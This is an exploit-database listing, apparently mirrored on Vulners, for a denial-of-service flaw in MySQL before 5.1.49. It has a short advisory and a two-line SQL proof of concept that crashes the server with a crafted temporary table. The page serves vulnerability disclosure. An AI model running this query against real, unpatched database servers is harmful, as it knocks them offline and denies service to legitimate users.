Lucene search
+L

MySQL 5.1.48 - 'Temporary InnoDB' Tables Denial of Service

🗓️ 19 Aug 2010 00:00:00Reported by Boris ReisigType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 23 Views

MySQL 5.1.48 'Temporary InnoDB' Tables DoS vulnerability, affecting versions prior to 5.1.4

Related
Code
source: https://www.securityfocus.com/bid/42598/info

MySQL is prone to a denial-of-service vulnerability.

An attacker can exploit these issues to crash the database, denying access to legitimate users.

This issues affect versions prior to MySQL 5.1.49.

NOTE: This issue was previously covered in BID 42598 (Oracle MySQL Prior to 5.1.49 Multiple Denial Of Service Vulnerabilities) but has been given its own record to better document it.

mysql> SET storage_engine=MYISAM;

mysql> CREATE TEMPORARY TABLE mk_upgrade AS SELECT  IF(     NULL  IS NOT NULL,      NULL
, NULL) ; drop table mk_upgrade;

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Sep 2014 00:00Current
5.1Medium risk
Vulners AI Score5.1
CVSS 24
EPSS0.12229
23